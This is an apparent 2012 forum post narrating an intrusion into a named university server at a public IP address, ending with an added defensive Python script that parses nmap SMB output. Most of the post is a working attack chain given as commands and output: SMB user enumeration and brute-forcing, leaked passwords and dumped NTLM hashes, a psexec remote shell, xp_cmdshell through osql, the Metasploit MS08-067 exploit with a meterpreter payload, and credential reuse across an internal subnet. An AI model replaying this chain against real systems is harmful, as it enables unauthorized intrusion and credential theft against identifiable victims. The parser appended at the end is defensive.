nmap+msf intrusion of Guangxi Normal University
Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use the ms08-067 vulnerability in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the obtained hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack ~~
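Added defensive example, not part of the original post: a small Python triage script that parses the "Host script results" blocks in nmap's normal output (the same format the post shows for smb-enum-shares, smb-brute and smb-check-vulns) and turns the three weaknesses this walkthrough relied on into findings a defender can act on: anonymous share access, guessable or blank SMB credentials, and an unpatched MS bulletin. The sample input is constructed from the output above; the function and class names are my own.

```python
import re
from dataclasses import dataclass

# Constructed sample: the host-script blocks as nmap printed them in the post above.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for bogon (202.103.242.241)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

@dataclass
class Finding:
    host: str
    severity: str
    detail: str

def parse_host_scripts(text):
    """Split one host's 'Host script results' block into {script_name: [cleaned lines]}."""
    host, scripts, current = None, {}, None
    for line in text.splitlines():
        m = re.match(r"Nmap scan report for (?:\S+ )?\(?([\d.]+)\)?", line)
        if m:
            host = m.group(1)
        elif re.match(r"\|\s*[\w-]+:\s*$", line):        # "| smb-brute:" opens a section
            current = line.strip("| _:")
            scripts[current] = []
        elif current and line.startswith("|"):            # strip the "|", "|_" tree prefix
            scripts[current].append(line.lstrip("|_ ").rstrip())
    return host, scripts

def triage(host, scripts):
    """Turn the script output into findings, worst cases marked critical."""
    findings = []
    shares = scripts.get("smb-enum-shares", [])
    for i, line in enumerate(shares):
        # the share name is the line just before its "Anonymous access" line
        if i and line.startswith("Anonymous access:") and "<none>" not in line:
            level = line.split(":", 1)[1].strip()
            findings.append(Finding(host, "high", f"share {shares[i - 1]} allows anonymous {level}"))
    for line in scripts.get("smb-brute", []):
        m = re.match(r"(\S+):(\S+) => Login was successful", line)
        if m:
            user, pw = m.groups()
            sev = "critical" if pw == "<blank>" else "high"
            findings.append(Finding(host, sev, f"guessable SMB credential {user}:{pw}"))
    for line in scripts.get("smb-check-vulns", []):
        m = re.match(r"(MS\d{2}-\d{3}):\s*VULNERABLE", line)
        if m:
            findings.append(Finding(host, "critical", f"unpatched {m.group(1)}"))
    return findings
```

Running `triage(*parse_host_scripts(SAMPLE_NMAP_OUTPUT))` yields four findings; the same parser works on a saved `nmap -oN` file of a scan you run against your own hosts.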